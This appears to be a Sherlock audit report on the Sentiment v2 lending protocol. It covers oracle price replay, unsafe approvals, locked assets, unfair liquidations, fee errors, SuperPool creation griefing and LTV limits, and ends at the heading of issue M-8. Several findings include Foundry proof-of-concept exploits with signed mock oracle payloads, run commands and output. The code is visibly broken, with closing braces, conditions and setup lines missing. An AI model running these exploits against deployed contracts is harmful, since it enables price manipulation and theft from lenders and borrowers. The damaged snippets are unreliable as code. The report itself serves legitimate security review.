sherlock-audit / 2024-08-sentiment-v2-judging

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Issue M-1: Red Stone Oracle Can Time Travel


Found by

HHK, cawfree


The RedstoneCoreOracle can be atomically manipulated repeatedly back and forth between different observations within the validity period to yield different price readings upon demand.

Vulnerability Detail

The RedstoneCoreOracle requires callers to manually update and cache the oracle price via the updatePrice function:

function updatePrice() external {
    // values[0] -> price of ASSET/USD
    // values[1] -> price of ETH/USD
    // values are scaled to 8 decimals

    uint256[] memory values = getOracleNumericValuesFromTxMsg(dataFeedIds);

    assetUsdPrice = values[0];
    ethUsdPrice = values[1];

    // RedstoneDefaultLibs.sol enforces that prices are not older than 3 mins. since it is not
    // possible to retrieve timestamps for individual prices being passed, we consider the worst
    // case and assume both prices are 3 mins old
    priceTimestamp = block.timestamp - THREE_MINUTES;

Although here we correctly consider the worst-case staleness for newly-submitted observation (and the inter-observation timestamps themselves are validated to be consistent between both readings), there are are no protections against repeatedly calling updatePrice using valid data during the result validity period (for example, two different observations which took place within the same validity period) - even if that data has been seen before.

This means it is possible to call updatePrice with one valid observation, immediately call it with a second valid observation, and then update again to revert back to the original observation in an effort to manipulate price.

Proof of Concept

This proof of concept is split into two sections - for quick verification, judges need only focus on the first part, whereas the second part provides instructions on how to recreate mock payloads locally.

Example Observations (default)

  1. Add the following file (i.e. Sherlock.t.sol) to the protocol-v2/test directory:
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.24;

import {Test, console} from "forge-std/Test.sol";
import { Math } from "@openzeppelin/contracts/utils/math/Math.sol";
import "@redstone-oracles-monorepo/packages/evm-connector/contracts/data-services/MainDemoConsumerBase.sol";

import {RedstoneCoreOracle} from "../src/oracle/RedstoneOracle.sol";

/// @notice A mock oracle which allows us to use Sentiment's
/// @notice `RedstoneCoreOracle` in conjunction with the
/// @notice mock payload signatures.
contract SherlockRedstoneCoreOracle is RedstoneCoreOracle {

    constructor(address asset, bytes32 assetFeedId, bytes32 ethFeedId)
        RedstoneCoreOracle(asset, assetFeedId, ethFeedId) {}

    function getUniqueSignersThreshold() public view virtual override returns (uint8) {
        return 1;

    function getAuthorisedSignerIndex(
        address signerAddress
    ) public view virtual override returns (uint8) {
        /// @notice Using the address related to the private key in
        /// @notice Redstone Finance's `minimal-foundry-repo`:

        /// @dev const redstoneWallet = new ethers.Wallet('0x548e7c2fae09cc353ffe54ed40609d88a99fab24acfc81bfbf5cd9c11741643d');
        //  @dev console.log('Redstone:', redstoneWallet.address);
        /// @dev Redstone: 0x71d00abE308806A3bF66cE05CF205186B0059503
        if (signerAddress == 0x71d00abE308806A3bF66cE05CF205186B0059503) return 0;

        revert SignerNotAuthorised(signerAddress);

contract SherlockTest is Test {

    using Math for uint256;

    /// @notice Demonstrate that the `RedstoneCoreOracle` is
    /// @notice vulnerable to manipulation.
    function testSherlockRedstoneTimestampManipulation() external {
        /// @notice You must use an Arbitrum mainnet compatible
        /// @notice archive node rpc.

        /// @notice This conditional controls whether to generate and sign
        /// @notice Redstone payloads locally, in case judges would like to
        /// @notice verify the payload content for themselves. This happens
        /// @notice if you specify `GENERATE_REDSTONE_PAYLOADS=true`
        /// @notice in your `.env`.
        /// @notice By default, the test suite will fall back to the included payloads. 
        bool generatePayloads = vm.envExists("GENERATE_REDSTONE_PAYLOADS");
        if (generatePayloads) generatePayloads = vm.envBool("GENERATE_REDSTONE_PAYLOADS");

        /// @notice Warp to a recent Arbitrum block. We have this fixed
        /// @notice in place to ease the generation of mock observations
        /// @notice which satisfy the validity period.
        vm.warp(243528007) /* Warp To Block */;

        bytes memory beforePayload = (
                ? new SherlockMockRedstonePayload().getRedstonePayload("ETH:3000:8,USDC:1:8", "243528007000")
                : bytes(hex"455448000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000045d964b80055534443000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005f5e1000038b3667d5800000020000002f3d4b060d793f6ba027fcbb94ab6ba26f17a1527446c42e7bc32e14926aa2f1167d1d38049f766c56d48170b9acdea4315b2132a6e3bba0137b87bf2305df1371c0001000000000002ed57011e0000")

        bytes memory afterPayload = (
                ? new SherlockMockRedstonePayload().getRedstonePayload("ETH:2989:8,USDC:1:8", "243528066000" /* 59s in the future */)
                : bytes(hex"45544800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004597d40d0055534443000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005f5e1000038b36763d00000002000000290709f13dc06738bbdb82175adbd9b0532cad9db59367b9e63ffac979230fdf222a0043cbcfe6244c30207df1355c416c6165b5d0b1d2a54eab53a807de8a5ed1b0001000000000002ed57011e0000")

        SherlockRedstoneCoreOracle sherlockRedstoneCoreOracle = new SherlockRedstoneCoreOracle({
            asset: 0xaf88d065e77c8cC2239327C5EDb3A432268e5831,
            assetFeedId: bytes32("USDC"),
            ethFeedId: bytes32("ETH")

        bool success;

        console.log("Apply Before Payload:");
        (success,) = address(sherlockRedstoneCoreOracle).call(
            abi.encodePacked(abi.encodeWithSignature("updatePrice()"), beforePayload)

        console.log("ETH:", sherlockRedstoneCoreOracle.ethUsdPrice());
        console.log("USDC:", sherlockRedstoneCoreOracle.assetUsdPrice());

        console.log("Apply After Payload:");
        (success,) = address(sherlockRedstoneCoreOracle).call(
            abi.encodePacked(abi.encodeWithSignature("updatePrice()"), afterPayload)

        console.log("ETH:", sherlockRedstoneCoreOracle.ethUsdPrice());
        console.log("USDC:", sherlockRedstoneCoreOracle.assetUsdPrice());

        console.log("Apply Before Payload Again:");
        (success,) = address(sherlockRedstoneCoreOracle).call(
            abi.encodePacked(abi.encodeWithSignature("updatePrice()"), beforePayload)

        console.log("ETH:", sherlockRedstoneCoreOracle.ethUsdPrice());
        console.log("USDC:", sherlockRedstoneCoreOracle.assetUsdPrice());


/// @notice A contract which we can use to pull results from
/// @notice `getRedstonePayload.js`, a utility which enables
/// @notice us to mock redstone payloads for local development.
/// @notice This is only used when `GENERATE_REDSTONE_PAYLOADS=true`.
/// @notice Credit:
contract SherlockMockRedstonePayload is Test {
    function getRedstonePayload(
        // dataFeedId:value:decimals
        string memory priceFeed,
        // i.e. 1000
        string memory timestampMilliseconds
    ) public returns (bytes memory) {
        string[] memory args = new string[](4);
        args[0] = "node";
        args[1] = "../minimal-foundry-repo/getRedstonePayload.js";
        args[2] = priceFeed;
        args[3] = timestampMilliseconds;

        return vm.ffi(args);

Next, run ARB_RPC_URL="arbitrum-archive-node-url" forge test --match-test "testSherlockRedstoneTimestampManipulation" --ffi -vv to yield the following:

Ran 1 test for test/Sherlock.t.sol:SherlockTest
[PASS] testSherlockRedstoneTimestampManipulation() (gas: 1332213)
  Apply Before Payload:
  ETH: 300000000000
  USDC: 100000000
  Apply After Payload:
  ETH: 298900000000
  USDC: 100000000
  Apply Before Payload Again:
  ETH: 300000000000
  USDC: 100000000

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.52s (2.52s CPU time)

Ran 1 test suite in 3.10s (2.52s CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)

This demonstrates that the oracle price can be manipulated arbitrarily, atomically.

Generating Observations

In order to validate the calldata in the provided proof of concept exploit is authentic, in addition to the previous steps, judges will need to perform the following:

  1. Clone Redstone Finance's minimal-foundry-repo to the top-level of the contest repo.
  2. Run through the setup instructions.
  3. Modify getRedstonePayload.js so that we can control the timestamp that the signatures are validated at via CLI argument, instead of using the system clock (this ensures we can generate observations which match the fork block number in the test):
- const timestampMilliseconds =;
+ const timestampMilliseconds = parseInt(args[1]); /// @dev Allow us to use custom timestamps.
  1. Verify the implementation is working. In the working directory of minimal-foundry-repo, you should be able to generate simulated observations at custom timestamps like so:
node getRedstonePayload.js ETH:2989:8,USDC:1:8 243528066000
  1. Finally, re-run the tests back in the foundry project using:
GENERATE_REDSTONE_PAYLOADS=true ARB_RPC_URL="arbitrum-archive-node-url" forge test --match-test "testSherlockRedstoneTimestampManipulation" --ffi -vv


The RedstoneCoreOracle can be arbitrarily and repeatedly warped between preferential timepoints that coexist within the validity period, and is therefore highly susceptible to price manipulation.

An attacker may exploit volatility over a three minute period (i.e. a stepwise reduction or appreciation in relative asset value) and repeatedly trade between minima and maxima - for example, purchasing at a checkpoint of low valuation and selling at a checkpoint of higher valuation.

This manipulation can be performed atomically within a single transaction, and requires little complexity.

Code Snippet

Tool used

Manual Review


Allow at least the THREE_MINUTES period to expire since the last update before accepting a new update; if an attempt is made during this period, then terminate execution silently without a revert.

Here's an example of this approach.

Issue M-2: Super pool uses ERC20.approve instead of safe approvals, causing it to always revert on some ERC20s


Found by

000000, 0xAlix2, 0xBeastBoy, 0xLeveler, 0xdeadbeef, A2-security, AresAudits, Bauer, EgisSecurity, JuggerNaut63, KupiaSec, MohammedRizwan, Nihavent, NoOne, Obsidian, X12, ZeroTrust, cryptomoon, h2134, hash, jennifer37, sheep


Super pools that get created on a specific asset then leverage its positions and deposit them in the "main" pools. Super pools get created in SuperPoolFactory::deploySuperPool, where some initial amount is sent from the user, and then deposited in the deployed super pool. When the assets are sent from the user, the factory approves the deployed pool, to allow outbound transfers, this is done using

IERC20(asset).approve(address(superPool), initialDepositAmt);

And the "default" ERC20 behavior expects the approve function to return a boolean, however, some ERC20s on some chains don't return a value. The most popular example is USDT on the main net, and as the docs mention it should be compatible on any EVM chain and will support USDT:

Q: On what chains are the smart contracts going to be deployed? Any EVM-compatbile network

Q: If you are integrating tokens, are you allowing only whitelisted tokens to work with the codebase or any complying with the standard? Are they assumed to have certain properties, e.g. be non-reentrant? Are there any types of weird tokens you want to integrate? Tokens are whitelisted, only tokens with valid oracles can be used to create Base Pools. Protocol governance will ensure that oracles are only set for standard ERC-20 tokens (plus USDC/USDT)

Another occurrence of this is SuperPool::reallocate, here.

This causes Super pool to never work on these chains/tokens.

Root Cause

Some known tokens don't return a value on approvals, more info here, an example of this is USDT, which is mentioned that the protocol will use it.

Standard ERC20s return a boolean on approval,

USDT on the main net doesn't return a value,


Super pools can never be created and used for assets that don't return a value on approval, an example of this is USDT on Ethereum main net.


Minimal mock USDT token:

// SPDX-License-Identifier: AGPL-3.0-only
pragma solidity >=0.8.0;

contract MockUSDT {
    string public name;
    string public symbol;
    uint8 public immutable decimals;
    uint256 public totalSupply;
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    constructor(string memory _name, string memory _symbol, uint8 _decimals) {
        name = _name;
        symbol = _symbol;
        decimals = _decimals;

    function approve(address spender, uint256 amount) public {
        allowance[msg.sender][spender] = amount;

    function transfer(address to, uint256 amount) public returns (bool) {
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;
        return true;

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public returns (bool) {
        uint256 allowed = allowance[from][msg.sender];
        if (allowed != type(uint256).max)
            allowance[from][msg.sender] = allowed - amount;
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;

Add the following test in protocol-v2/test/core/Superpool.t.sol.

function testSuperPoolUSDT() public {
    MockUSDT USDT = new MockUSDT("USDT", "USDT", 6);
    FixedPriceOracle USDToracle = new FixedPriceOracle(1e18);

    riskEngine.setOracle(address(USDT), address(USDToracle));

    uint256 amount = 100e6;

    deal(address(USDT), address(this), amount);

    USDT.approve(address(superPoolFactory), amount);

        0.01 ether,
        1_000_000 ether,


Use safeApprove instead of approve in SuperPoolFactory::deploySuperPool and SuperPool::reallocate.

Issue M-3: Removing a known asset in the PositionManager causes all deposited funds of that asset to be locked forever


Found by

000000, 0xAlix2, 0xAristos, 0xDazai, 0xLeveler, A2-security, KupiaSec, Tendency, ThePharmacist, Yashar, almurhasan, cryptomoon, dhank, iamandreiski, theweb3mechanic, tvdung94


When users deposit funds in their position through the position manager, it checks if the deposited asset is known, this is done in:

// mitigate unknown assets being locked in positions
if (!isKnownAsset[asset]) revert PositionManager_DepositUnknownAsset(asset);

This makes sense, as not to allow users to deposit dummy/worthless assets in their positions. The position manager also allows users to transfer tokens out of their position, the main problem is that it also checks if the asset is known before allowing the transfer.

This causes an issue where if the user had some funds deposited in token X, and then that token X was removed from known assets, the user's funds will be locked/stuck forever.

NOTE: even if the owner is trusted, however, in case of an attack or a depeg or any other scenario, and the owner urgently removes the asset, users should still be able to transfer out these tokens. It doesn't make sense for the owner to "wait" until all users transfer out these tokens in case of an emergency.

Root Cause

The main issue lies in the "isKnownAsset" check in PositionManager::transfer,

if (!isKnownAsset[asset]) revert PositionManager_TransferUnknownAsset(asset);

Attack Path

  1. The user deposits some funds of token X.
  2. For whatever reason, X is removed from the known assets in the position manager.
  3. The user is unable to transfer out his deposited tokens, and they're stuck forever.


The user's tokens will remain stuck in his position forever.


Add the following test in protocol-v2/test/core/PositionManager.t.sol:

function testStuckTokens() public {
    uint256 amount = 100 ether;

    deal(address(asset2), positionOwner, amount);

    // Verify that asset2 is known

    // User adds asset2 to the position and deposits 100 tokens
    asset2.approve(address(positionManager), amount);
        deposit(address(asset2), amount)

    // asset2 is removed from the known assets

    // Verify that asset2 is not known

    // User tries to transfer out his tokens, reverts
        transfer(positionOwner, address(asset2), amount)


Remove the "isKnownAsset" check from PositionManager::transfer.

Issue M-4: Liquidators Are Incentivised To Create Imaginary Borrow Debt


Found by

Oblivionis, Obsidian, X12, cawfree


Liquidators have the freedom to control how many borrow shares are burned from a position during liquidation, regardless of the underlying capital that is taken.

This allows liquidators to liquidate positions but leave them in a state that they continue to grow unhealthy, even though all outstanding debts have been repaid.

Vulnerability Detail

When liquidating a risky position via liquidate, the liquidator has the freedom to specify the to be taken from the position (assetData) independently of the outstanding debt that is processed (debtData):

/// @notice Liquidate an unhealthy position
/// @param position Position address
/// @param debtData DebtData object for debts to be repaid
/// @param assetData AssetData object for assets to be seized
function liquidate(
    address position,
    DebtData[] calldata debtData, /// @audit debtData_and_assetData_are_independent_of_one_another
    AssetData[] calldata assetData
) external nonReentrant {
    riskEngine.validateLiquidation(position, debtData, assetData);

    // liquidate
    _transferAssetsToLiquidator(position, assetData);
    _repayPositionDebt(position, debtData);

    // position should be within risk thresholds after liquidation
    if (!riskEngine.isPositionHealthy(position)) revert PositionManager_HealthCheckFailed(position);
    emit Liquidation(position, msg.sender, ownerOf[position]);

Due to insufficient validation, there is a discontinuity between the number of assets that are taken from a position versus the underlying shares that are burned.

We can demonstrate that due to this inconsistency, a liquidator can liquidate a position and has the power to control whether to burn all the outstanding borrows (i.e. make the position healthy again) or liquidate the same amount of assets but leave outstanding borrows (i.e. make the position healthy again but allow it to continue to grow unhealthy post liquidation, even though all obligations have been fully repaid).

In both instances, although all of debt is repaid, the liquidator can control the amount of borrow shares remaining; thus they can fully liquidate a position but allow the position to grow more unhealthy as a means of value extraction.


To verify the following proof of concept, copy the testLiquidateUnfairly function to test/LiquidationTest.t.sol:

/// @notice The liquidator can leave outstanding debt obligations
/// @notice for fully-repaid loans.
function testLiquidateUnfairly() public {

    /// @notice The environment variable `SHOULD_LIQUIDATE_UNFAIRLY` can
    /// @notice can be used to toggle between the different cases:
    bool shouldLiquidateUnfairly = vm.envExists("SHOULD_LIQUIDATE_UNFAIRLY")
        && vm.envBool("SHOULD_LIQUIDATE_UNFAIRLY");

    /// @dev Prepare assets for the two users:, 200e18);, 200e18);

        asset2.approve(address(positionManager), type(uint256).max);

    /// @dev Create positions for both users.
    (address userPosition, Action memory userAction)
        = newPosition(user, bytes32(uint256(0x123456789)));

    /// @dev Let's also assume the pool has deep liquidity:
        asset1.approve(address(pool), type(uint256).max);
        pool.deposit(fixedRatePool, 100e18, lender);

    /// @dev Let's create a borrow positions for the `user`:
    Action[] memory actions = new Action[](4);
            actions[0] = userAction;
            actions[1] = deposit(address(asset2), 1e18);
            actions[2] = addToken(address(asset2));
            actions[3] = borrow(fixedRatePool, 0.5e18);
            positionManager.processBatch(userPosition, actions);

    /// @dev Created position is healthy:

    /// @dev Okay, let's assume due to market conditions,
    /// @dev asset2 deprecations and the position has become
    /// @dev liquidatable:
        riskEngine.setOracle(address(asset2), address(new FixedPriceOracle(0.99e18))); // 1 asset2 = 0.99 eth

    /// @dev Created position is unhealthy:

    (uint256 totalAssetValue, uint256 totalDebtValue, uint256 minReqAssetValue) = riskEngine.getRiskData(userPosition);

            ? "Liquidating unfairly..."
            : "Liquidating fairly..."

    uint256 positionShortfall = minReqAssetValue - totalAssetValue;
    assertEq(positionShortfall, 10000000000000000);

    /// @dev Liquidate the `userPosition`., 100 ether);
        asset1.approve(address(positionManager), type(uint256).max);

        /// @notice Initial Liquidator Balances:
        assertEq(asset1.balanceOf(liquidator), 100000000000000000000);
        assertEq(asset2.balanceOf(liquidator), 0);

        /// @notice Initial Position Balances:
        assertEq(asset1.balanceOf(userPosition), 500000000000000000);
        assertEq(asset2.balanceOf(userPosition), 1000000000000000000);
        assertEq(protocol.pool().getBorrowsOf(fixedRatePool, userPosition), 500000000000000000);

            // construct liquidator data
            DebtData[] memory debts = new DebtData[](1);
            debts[0] = DebtData({
                poolId: fixedRatePool,
                /// @notice In the fair case, the liquidator takes `500000000000000000`
                /// @notice borrow shares (`getBorrowsOf`). In the unfair case, the
                /// @notice liquidator need only take `10000000000000000`:
                amt: shouldLiquidateUnfairly ? 10000000000000000 : type(uint256).max
            AssetData[] memory assets = new AssetData[](1);
            assets[0] = AssetData({ asset: address(asset2), amt: positionShortfall });
            positionManager.liquidate(userPosition, debts, assets);

        assertTrue(riskEngine.isPositionHealthy(userPosition)) /* @notice Position is healthy immediately after. */;

        /// @notice First, notice the position's underlying assets are
        /// @notice liquidated identically for both the unfair liquidation
        /// @notice and the fair liquidation. This means in both instances,
        /// @notice all outstanding debt is repaid.
        assertEq(asset1.balanceOf(userPosition), 500000000000000000);
        assertEq(asset2.balanceOf(userPosition), 990000000000000000);

            protocol.pool().getBorrowsOf(fixedRatePool, userPosition),
            /// @notice However, the unfair liquidation left outstanding borrow
            /// @notice shares even though the underlying assets were liquidated
            /// @notice consistently:
            shouldLiquidateUnfairly ? 490000000000000000 : 0

        /// @notice When liquidating unfairly by leaving bad shares, the
        /// @notice liquidator spends less `asset1` in the process. This means
        /// @notice the protocol actually incentivises liquidators to act
        /// @notice maliciously:
                ? 99990000000000000000 /// @audit The liquidator is charged less for leaving outstanding borrow shares.
                : 99500000000000000000

        vm.warp(block.timestamp + 24 hours);

        /// @notice If the liquidator operates maliciously, the position
        /// @notice is unfairly liable to more liquidations as time progresses:
        assertEq(riskEngine.isPositionHealthy(userPosition), !shouldLiquidateUnfairly);
                    "One day after liquidation, the position is ",
                    riskEngine.isPositionHealthy(userPosition) ? "healthy" : "unhealthy",


Then run using:

SHOULD_LIQUIDATE_UNFAIRLY=false forge test --match-test "testLiquidateUnfairly" -vv # Happy path
SHOULD_LIQUIDATE_UNFAIRLY=true forge test --match-test "testLiquidateUnfairly" -vv # Malicious path

This confirms that liquidators have the choice to leave outstanding borrow shares on liquidated positions, even though for the exact same liquidation of assets, the position could have been left with zero outstanding borrow shares.

Additionally, we show that the liquidator actually returns less asset1 to the pool, even though they are redeeming the same amount of underlying asset2 from the liquidated position.


Due to the monetary incentives, it is actually more rational for liquidators to liquidate positions unfairly.

This undermines the safety of all borrowers.

Additionally, imaginary borrow debt will prevent borrowers from being able to withdraw their own funds, even though all their debt was fairly repaid. Since the position's collateral cannot be withdrawn due to these imaginary outstanding borrow shares, this permits the malicious liquidator to repeatedly liquidate the position.

We can also anticipate that this debt would grow quite quickly, since the PoC demonstrates that after repaying all debt, the malicious liquidator can force the position into retaining 490000000000000000 / 500000000000000000 (98%) of the original borrow obligation.

Code Snippet

/// @notice Liquidate an unhealthy position
/// @param position Position address
/// @param debtData DebtData object for debts to be repaid
/// @param assetData AssetData object for assets to be seized
function liquidate(
    address position,
    DebtData[] calldata debtData,
    AssetData[] calldata assetData
) external nonReentrant {
    riskEngine.validateLiquidation(position, debtData, assetData);

    // liquidate
    _transferAssetsToLiquidator(position, assetData);
    _repayPositionDebt(position, debtData);

    // position should be within risk thresholds after liquidation
    if (!riskEngine.isPositionHealthy(position)) revert PositionManager_HealthCheckFailed(position);
    emit Liquidation(position, msg.sender, ownerOf[position]);

Tool used

Manual Review


Do not permit liquidators the flexibility to control the number of borrow shares burned, instead, compute these as a function of the assets taken from the position.

Issue M-5: Liquidation fee is incorrectly calculated, leading to unprofitable liquidations


Found by

0xKartikgiri00, A2-security, Bigsam, EgisSecurity, HHK, Oblivionis, Obsidian, Ryonen, S3v3ru5, ThePharmacist, X12, ZeroTrust, cryptomoon, hash, nfmelendez, ravikiran.web3


Incorrect liquidation fee calculation makes liquidations unprofitable, leading to insolvency.

Root Cause

During PositionManager.liquidate() , two things happen:

  1. An amount x of the position’s collateral is paid to the liquidator (link)
  2. The liquidator pays off the debt of the position (link)

During step 1, the liquidation fee is effectively calculated as liquidationFee.mulDiv(x, 1e18)

This is incorrect- the correct way would be to take the liquidation fee from the profit of the liquidator, rather than from the entire amount x

Due to this inaccuracy, a large majority of liquidations will be unprofitable:

Example scenario

Consider a situation where liquidation fee is 30% (as stated in the contest README)

Say LTV = 90%, Debt value = $90, Collateral value drops from $100 to $98

Now, since the position LTV (90/98) is greater than the set LTV (90/100), the position is liquidatable

A liquidator aims to pay off the debt and receive the $98 worth of collateral, effectively buying the collateral at a discount of ~8%

However, They will only receive 70% of the $98 (due to the 30% liquidation fee), so they can only receive $68.6

This is extremely unprofitable since they have to pay off $90 worth of debt, and only receive $68.6 as a reward.

The correct approach to calculating fee would be the following:

  1. Calculate liquidator profit = Reward - Cost = $98 - $90 = $8
  2. Calculate liquidator fee = feePercentage*profit = 30% of $8 = $2.4

This ensures that liquidations are still incentivised

Internal pre-conditions

No response

External pre-conditions

No response

Attack Path

No response


Liquidations are unprofitable due to liquidation fee being calculated incorrectly.

This leads to bad debt and insolvency since there is no incentive to liquidate.


No response


Consider calculating the profit of the liquidation first, and take the fee based on that

Issue M-6: Griefer can DOS the SuperPool creation and make it very expensive for other users


The protocol has acknowledged this issue.

Found by

0xarno, 0xdeadbeef, A2-security, EgisSecurity, Kalogerone, Oblivionis, Yashar


The SuperPoolFactory.sol contract creates new SuperPool instances using the new keyword, which is essentially using the CREATE opcode. This means that the address of the next SuperPool instance can be known by any user. To create a new SuperPool, it's essential to deposit and burn a minimum of 1000 shares. A griefer can frontrun SuperPool creation transactions and transfer small amounts of tokens to the known SuperPool address to make shares expensive and prevent the creation of the SuperPool.

Root Cause

  1. When using the CREATE opcode, the new contract address depends on the deployer address (the SuperPoolFactory.sol address which is known) and its nonce (which can be calculated by simply looking at SuperPoolFactory's etherscan). Even ethers has a function to calculate the next address. This means that the next SuperPool address that will be created is known and can't be changed.

  2. SuperPool creation requires the user to deposit and burn a minimum of 1000 shares, otherwise the transaction will revert.


    function deploySuperPool(
        address owner,
        address asset,
        address feeRecipient,
        uint256 fee,
        uint256 superPoolCap,
        uint256 initialDepositAmt,
        string calldata name,
        string calldata symbol
    ) external returns (address) {
        if (fee != 0 && feeRecipient == address(0)) revert SuperPoolFactory_ZeroFeeRecipient();
@>      SuperPool superPool = new SuperPool(POOL, asset, feeRecipient, fee, superPoolCap, name, symbol);
        isDeployerFor[address(superPool)] = true;

        // burn initial deposit
        IERC20(asset).safeTransferFrom(msg.sender, address(this), initialDepositAmt); // assume approval
        IERC20(asset).approve(address(superPool), initialDepositAmt);
@>      uint256 shares = superPool.deposit(initialDepositAmt, address(this));
@>      if (shares < MIN_BURNED_SHARES) revert SuperPoolFactory_TooFewInitialShares(shares);
        IERC20(superPool).transfer(DEAD_ADDRESS, shares);

        emit SuperPoolDeployed(owner, address(superPool), asset, name, symbol);
        return address(superPool);

Note that uint256 public constant MIN_BURNED_SHARES = 1000;

An attacker can frontrun this transaction from a regular user and donate to the already known address a small amount of the SuperPool's selected asset to inflate the shares and make them very expensive for the user to create the SuperPool (exact numbers shown in the coded PoC).

The shares inflation happens because of the _convertToShares function used in the deposit function:

    function deposit(uint256 assets, address receiver) public nonReentrant returns (uint256 shares) {
@>      shares = _convertToShares(assets, lastTotalAssets, totalSupply(), Math.Rounding.Down);
        if (shares == 0) revert SuperPool_ZeroShareDeposit(address(this), assets);
        _deposit(receiver, assets, shares);
    function _convertToShares(
        uint256 _assets,
        uint256 _totalAssets,
        uint256 _totalShares,
        Math.Rounding _rounding
    ) public view virtual returns (uint256 shares) {
        shares = _assets.mulDiv(_totalShares + 1, _totalAssets + 1, _rounding);

Normally a user would only need 1000 assets to mint 1000 shares (1000 1 / 1 = 1000 shares using the _convertToShares formula above). Imagine a donation of 1000000 assets before the transaction. Now 1000 assets would give 0 shares (1000 1 / 1000001 = 0 shares). With a token like USDC which has 6 decimals and is in scope, a user would need $1000 to overcome a $1 donation and mint 1000 shares.

Internal pre-conditions

No response

External pre-conditions

No response

Attack Path

  1. Attacker calculates the address of the next SuperPool.
  2. User sends a transaction to create a SuperPool.
  3. Attacker frontruns this transaction and donates a small amount of the user's specified SuperPool asset.
  4. User's transaction fails due to not enough dead shares minted.
  5. It is now very expensive to create that specific SuperPool.


It will become very expensive to create a SuperPool, many users won't want to do it and SuperPools will stop getting created.


Paste the following code in the test/core/Superpool.t.sol test file and follow the comments:

    function testSuperPoolDOS() public {
        // Let's say that the asset is USDC which has 6 decimals and assume 1 USDC = $1, 10 ether);, 10 ether);

        // User has calculated the address of the next SuperPool and donates 1 USDC before the creation transaction
        asset1.transfer(0x1cEE5337E266BACD38c2a364b6a65D8fD1476f14, 1_000_000);

        asset1.approve(address(superPoolFactory), 10 ether);

        // Error selectors to be used with the vm.expectReverts
        bytes4 selectorFactory = bytes4(keccak256("SuperPoolFactory_TooFewInitialShares(uint256)"));
        bytes4 selectorSuperPool = bytes4(keccak256("SuperPool_ZeroShareDeposit(address,uint256)"));

        // Deposit amounts
        uint256 normalMinAmount = 1000;
        uint256 oneThousandUSDC = 1_000_000_000;

        // user2 tries to create a SuperPool sending the supposed min amount of 1000, it reverts because he minted 0
        // shares
        vm.expectRevert(abi.encodeWithSelector(selectorSuperPool, 0x1cEE5337E266BACD38c2a364b6a65D8fD1476f14, 1000));
            user2, address(asset1), user2, 0.01 ether, type(uint256).max, normalMinAmount, "test", "test"

        // user2 tries to create a SuperPool sending 1000 USDC, it reverts because he minted 999 shares
        vm.expectRevert(abi.encodeWithSelector(selectorFactory, 999));
            user2, address(asset1), user2, 0.01 ether, type(uint256).max, oneThousandUSDC, "test", "test"

        // Here is a test to prove that SuperPool creation is NOT dependant on block.timestamp, block.number, address
        // calling the transaction or function parameters
        // All of these are changed and the transaction fails with the same error message because it still creates the
        // SuperPool at the same address as befores
        asset1.approve(address(superPoolFactory), 10 ether);
        vm.warp(block.timestamp + 45_914_891);
        vm.roll(block.number + 100);

        vm.expectRevert(abi.encodeWithSelector(selectorFactory, 999));
            user, address(asset1), user, 0.01 ether, type(uint256).max, oneThousandUSDC, "test1", "test1"

        // user2 sends the transaction with 1001 USDC, it is now succesful since it minted the required 1000 shares
            user2, address(asset1), user2, 0.01 ether, type(uint256).max, 1_001_000_000, "test", "test"


Don't require from the user to deposit and actually mint the dead shares. You can hardcode them in the SuperPool contract by making for e.g.:

  1. The totalAssets function to return the actual total assets + 1000
  2. The totalSupply function to return the actual total supply + 1000

Issue M-7: LTV of 98% would be extremely dangerous


Found by



Having an LTV of 98% that pools can set is really dangerous as it doesn't take into account that oracle prices have the so called deviation, which can be anywhere from 0.25% to 2%. Meaning that the actual LTV would be LTV + oracle1 deviation + oracle2 deviation, which can result in > 100% LTV.

Vulnerability Detail

The README gives us a range for the possible LTV.

Min LTV = 10% = 100000000000000000 Max LTV = 98% = 980000000000000000

However this range reaches up to 98% which is extremely dangerous, no matter the asset, even if the supply-borrowing pair is stable coins.

Example oracles: stETH : ETH - 0.5% deviation DAI : ETH - 1% deviation USDC : ETH - 1% deviation USDT : ETH - 1% deviation

Both assets may be denominated in ETH, but their value is compared one to one, meaning that a user can deposit USDC to his position and borrow USDT from a pool, where both prices would be compared in terms of ETH. They will not take effect from the price of ETH, but will be effected by the extra oracle deviation, as ETH is generally around 1% - 2% and stable coins to USD are around 0.1% (DAI : USD, USDC : USD, and so on... )

However with the above example we can see such a pool having actual LTV of 100%, as USDC can be 0.99 and USDT 1.01 with the oracle reporting both prices as 1.00 USD. In this case the pool will have 100% LTV allowing borrowers to borrow 100% of the pool causing a DOS and potentially adding some bad debt to the system. This would also distinctiveness liquidators a they won't have any profit from liquidating these positions (once the price normalizes) and may even be on a loss.

Example of similar scenario is the recent depeg on ezETH causing Mrpho to socialize some bad debt, even with reasonable LTV parameters - link.


LTV of 100% or even above would result in lenders losing their funds, as borrowers would not be incentivized to pay of their loans or would prefer to get liquidated if the price moves to their favor. Liquidators will not liquidate as they would be in a loss.

Code Snippet

    function acceptLtvUpdate(uint256 poolId, address asset) external {
        if (msg.sender != pool.ownerOf(poolId)) revert RiskEngine_OnlyPoolOwner(poolId, msg.sender);

        LtvUpdate memory ltvUpdate = ltvUpdateFor[poolId][asset];

        // revert if there is no pending update
        if (ltvUpdate.validAfter == 0) revert RiskEngine_NoLtvUpdate(poolId, asset);

        // revert if called before timelock delay has passed
        if (ltvUpdate.validAfter > block.timestamp) revert RiskEngine_LtvUpdateTimelocked(poolId, asset);

        // revert if timelock deadline has passed
        if (block.timestamp > ltvUpdate.validAfter + TIMELOCK_DEADLINE) {
            revert RiskEngine_LtvUpdateExpired(poolId, asset);

        // apply changes
        ltvFor[poolId][asset] = ltvUpdate.ltv;
        delete ltvUpdateFor[poolId][asset];
        emit LtvUpdateAccepted(poolId, asset, ltvUpdate.ltv);

Tool used

Manual Review


Have a lower max LTV.

Issue M-8: Improper handling of price normalization to e18 in RedstoneOracle.sol#getValueInEth


Found by

Anirruth, MVKsentry


